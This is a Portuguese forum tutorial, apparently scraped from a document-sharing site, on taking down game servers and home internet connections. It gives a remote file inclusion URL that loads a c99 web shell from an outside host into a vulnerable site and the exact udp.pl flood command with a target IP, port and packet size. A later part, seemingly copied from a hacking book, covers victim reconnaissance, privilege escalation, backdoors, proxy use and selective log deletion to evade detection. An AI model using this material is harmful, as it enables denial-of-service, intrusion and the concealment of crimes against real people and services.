Você está na página 1de 5

Bom pessoal, vi muita gente aqui do fórum perguntando como derrubar servidores de

jogos e conexões de internet então vou explicar rapidinho o básico como fazer, porém
vai ter que estudar algumas coisinhas para conseguir, principalmente obter uma shell
tem que ralar

Mas pelo menos não é um daqueles tutos de nuker ou de dar comando de ping no MS-
DOS para derrubar pq são técnicas ultrapassadas, essa aqui é uma maneira que
realmente se fizer tudo certo vc vai obter sucesso, lembrando que quanto mais shells
tiver, vai ser melhor seu ataque, podendo causar um DDOS (Distributed Denial of
Service) isso até deu dor de cabeça recentemente à cipsoft ( empresa que administra o
jogo Tibia)

Bom…Vamos lá…

Para derrubar servidores inclusive como OT de tíbia, conexões de internet, vc deve


primeiro obter uma Shell que vc tenha acesso liberado para fazer upload de um exploit
de Denial of Service (DoS)

Daí vc me pergunta oque é uma shell?


Vamos lá! Uma shell no nosso caso seria um site vulnerável que vc pode invadir por
exemplo por Php Injection daí obtendo a shell, vc vai lá em upload e faz upload do
exploit na shell, daí depois só executar o ataque…

Daí vc me pergunta como faço PHP Injection??

Eu respondo que é melhor vc estudar pq os tutoriais do fórum invasão ou de outros


lugares são quentíssimos, mas eu te dou uma dica…quando vc achar um site vulnerável
(vc pode usar um scanner e axar sites vulneráveis, pesquise por “STRINGS” por
exemplo: index.php?pag=) quando achar é só vc colocar uma CMD na frente do = por
exemplo: http://www.sitevuln.com/index.php?
pag=http://turkishdefacerteam.by.ru/c99.txt? nesse caso a CMD é essa:
http://turkishdefacerteam.by.ru/c99.txt?

Pronto! vc está dentro de sua shell!

Daí faça oq eu falei, faça download do udp.pl (pode ser usados outros exploits como o
f3) que tem em vários lugares como no site http://milw0rm.com/ (não esqueça de copiar
e colar o exploit no bloco de notas e salvar como extensão .pl) daí vc faz upload do seu
desse exploit do seu PC para a shell e executa o comando do ataque no campo da shell
“Execute”

Daí vc me pergunta e como executo esse ataque com o udp.pl?

Fácil, dps que vc já tiver upado o udp.pl é só vc ir no campo “execute” da shell e


executar o seguinte comando: perl udp.pl IP PORTA TAMANHO

EXEMPLO de ataque: perl udp.pl 200.2.206.233 0 50000

Ou seja…vc obtendo o IP do server de tibia ou o IP da vítima suponhamos que seja oq


eu puis é só vc “mandar ver ” a porta no caso eu puis 0 como vc pode perceber, vc
tbm pode colocar 0 pq é porta padrao e o exploit trabalha muito bem com a porta 0,
porntanto use-a…o tamanho dos pacotes eu puis 50000 pode usar tbm 50000 já tah
ótimo até demais!

Pronto o server irá cair se fez tudo correto, aviso que não é fácil pq tem q obter a shell,
mas está aí um mini tutorial muito bom que eu mesmo fiz nas coxas agora espero que
tenha entendido um pouco mais, e não esqueça de agredecer a mim no seu tópico…

Estude as partes que eu destaquei como: Shell, DoS (Denial of Service), PHP
Injection, udp.pl, exploits em perl, CMD’s e strings!

Meu video que fiz faz tempo eu derrubando um servidor de tibia muito bom veja meu
tópico de video-aulas ela é a 4ª vídeo-aula veja: http://www.forum-
invasao.com.br/novo/viewtopic.php?t=8545165

Lembrando que todo conteúdo que vc não souber a respeito dos que eu falei nesse
tutorial vc pode obter conhecimento procurando aqui no fórum ou no google.

Bem aqui tem umas dicas que eu acho que seja de bom agrado pra quem ta começando assim
como eu do zero vai ai umas dicas para um “hacking feliz”

1. Uma vez descoberta a vulnerabilidade, não tente invadir sua presa imediatamente. Ao
contrário, conheça sua vítima. Visite seu site na Internet (sem atacar, apertas olhe). Se for na
sua cidade, visite sua sede e tente descobrir mais sobre produtos, empregos, serviços,
funcionários, hábitos… Podem-se usar técnicas passivas (observação: para ver o que entra e o
que sai da máquina ou rede) ou ativas, como organizar miniataques a pontos isolados e
verificar as mensagens que são retomadas. O importante é coletar informações suficientes
para elaborar um plano de ação, preferencialmente com desfechos alternativos caso algo dê
errado.

2. O primeiro acesso a gente nunca esquece. Essa é a parte mais importante do ataque.
Pode-se dizer que esta etapa é o ataque propriamente dito. Depois de descoberta a
vulnerabilidade e examinado o comportamento da vítima, use o exploit apropriado para
ganhar acesso limitado ao sistema. E não se esqueça de usar um proxy público para esconder
seu endereço IP!

3. Humm. Uma vez com acesso limitado, a próxima etapa consiste em ganhar acesso total à
máquina (root para sistemas Unix, administrador para sistemas WinNT - no Win9x, o primeiro
acesso já garante controle total…). Cada SO possui procedimentos diferentes para tal. Uma vez
conseguido o acesso irrestrito, basta coletar as informações desejadas e, se for o caso,
desfigurar o sistema.

4. Agora que você já “ownou” o sistema, trate de cobrir seus rastros e instalar as portas de
trás. Verifique os logs do sistema e apague tudo o que for relativo à sua visita, MAS APENAS
ISSO! Resista à tentação de apagar o log todo - um “buraco” no registro de eventos fará com
que o administrador descubra mais cedo do que o esperado que alguém andou bulindo com
seu brinquedo. Depois de fazer a cirurgia nos logs, instale os backdoors. Alguns hackers mais
experientes têm o cuidado de aplicar patches no sistema para remover as portas que o
deixaram entrar, evitando assim que outros hackers menos habilidosos entrem no sistema e,
por descuido, alertem o administrador de que a máquina foi tomada. Mas neste ponto do
livro, nosso objetivo não é mais agir como script kiddies, que vagam pela Internet procurando
por presas fáceis que saibam caçar. Ao contrário, queremos ter uma idéia de como black hats,
digamos, profissionais” trabalham para alcançar seus objetivos em um alvo específico,
qualquer que seja seu nível de dificuldade. Para tanto, vamos tentar separar, por afinidade,
nossos esforços em seis passos distintos. Como guerra é o assunto do momento, usaremos
termos militares para nos referir a cada um deles. Talvez
as cruzadas, as guerras do Paraguai, Vietnã, Meganistão, os conflitos na Palestina ou até
mesmo a Guerra no Golfo 2 tenham passado. Mas os cybercombates entre hackers/crackers e
administradores de sistemas vão durar muitos anos, talvez séculos.

Passo 1: Planejamento

Hummm, é difícil dizer se este é realmente o passo 1. Na verdade, todos os passos são
interdependentes: precisamos das informações obtidas em cada movimento que fazemos para
poder planejar (e corrigir) adequadamente nosso ataque. A seqüência de atividades será,
portanto, algo parecido com 1-2-1-3-
1-4-1-5-1-6-1, em vez da óbvia 1-2-3-4-5-6. Como todo plano precisa de ajustes e como quase
toda tarefa pode ser subdividida em várias mais específicas, podemos perceber que o processo
de planejamento
será contínuo durante toda a batalha e durará até bem depois da fmalização do ataque. Cada
pequeno detalhe do ataque tem seu próprio plano 1-2-1-3-1-4-1-5-1-6-1. Se você não
documentar muito bem cada um dos passos que tem a fazer, acabará com um bocado grande
demais para mastigar sem
estalar a boca. E não esqueça: formas de esconder as provas do crime também fazem parte do
planejamento! Não basta saber o que está fazendo. É necessário saber por que está fazendo.
Se você tem uma resposta na ponta da língua quando perguntado “ei, por que você quer
invadir minha empresa?” pode seguir em frente. Mas não se esqueça de que, uma vez dentro,
você será rastreado. Se você já sabe o que quer fazer quando estiver entre os muros do
castelo, ótimo. Se não sabe, não tente! E não esqueça que, dependendo de seus intentos, você
estará incorrendo em algum crime.

Passo 2: Observação

Toda operação militar, seja governamental ou dos rebeldes, precisa estar embasada em
informações precisas e detalhadas sobre o alvo. O conjunto de dados necessários incluem
diversos subconjuntos aparentemente não relacionados: detalhes pessoais, como hábitos,
habilidades profissionais, passatempos, família, amigos, antigas namoradas; informações
corporativas, hierarquia interna,
clientes/concorrentes/fornecedores, dados sobre os sistemas de informação… Do monstro de
dados obtido, há ainda a necessidade de garimpar informações não disponíveis diretamente,
fazer referências cruzadas e, literalmente, “ler nas entrelinhas”. Várias técnicas podem ser
usadas aqui. A mais óbvia e eficaz (embora menos direta e mais perigosa) é a Engenharia
Social. Mas mesmo sem contar mentira alguma, é possível coletar uma coleção razoável de
informações obtidas da Internet ou de observação direta. Não se afobe: paciência é a palavra-
chave aqui.

Passo 3: Busca

Com os planos, mapas e a lista de tarefas na mão, podemos começar a procurar os buracos
pelos quais vamos entrar. Um arsenal numeroso e variado de scanners de portas e
vulnerabilidades deve estar à disposição para que todos os pontos fracos sejam revelados.
Assim como no passo anterior, paciência é
um dos ingredientes mais importantes desta etapa. Mas não o único. Não basta usar uma
ferramenta que revele o furo de segurança se você não entende como ela funciona.

Passo 4: Invasão

Há várias maneiras de ganhar acesso ao sistema-alvo. Nos capítulos Vulnerabilidades I e


11vimos algumas. Mas são técnicas pontuais, que exploram fraquezas específicas de um
sistema. A grande sacada é saber agrupar as várias técnicas disponíveis de maneira a atingir o
objetivo maior. Além disso, muitas
vezes é necessário passar por vários níveis de acesso até conseguir poderes suficientes para
atingir o objetivo final do ataque.

Passo 5: Manutenção

Nem todos os administradores de rede são completos idiotas. A maioria, na realidade, não é.
Uma vez detectada uma vulnerabilidade que possibilite um ataque, qualquer administrador
provido de bom senso vai aplicar os patches de segurança, fechando o rombo. Se você já
invadiu uma vez por um buraco na
segurança ou uma falha em algum programa, é possível que sua próxima tentativa, dias
depois, seja infrutífera: a porta estará fechada. Uma vez dentro dos muros do castelo, é
necessário instalar meios para que se possa entrar e sair sem ser notado, e que sejam
independentes das brechas de segurança do sistema.

Passo 6: Evasão

“Já invadi, já copiei, já desfigurei, já apaguei e já destruí, e ainda deixei portas secretas por
onde entrar e sair sem ser incomodado. E agora, faço o quê?” Bem, pequeno gafanhoto, está
na hora de apagar os rastros que você deixou. Essa etapa começa já na preparação do ataque,
escolhendo as ferramentas e procedimentos menos ruidosos, tomando cuidado para não
deixar aparente que está logado no sistema e, principalmente, tentando descobrir antes de
entrar se há um sistema IDS ativo. Depois de fazer o que tem de fazer (defacement, cópia de
arquivos e programas, lançamento de outros ataques), apague criteriosamente suas pegadas
nos arquivos de registro do sistema, tomando o cuidado de não
danificar os outros dados registrados. É uma falha amadoríssima “limpar” demais o logo Outro
cuidado que deve ser tomado já nos passos iniciais de planejamento é a prevenção contra
sistemas de detecção de intrusos, os famigerados IDSs.

Você também pode gostar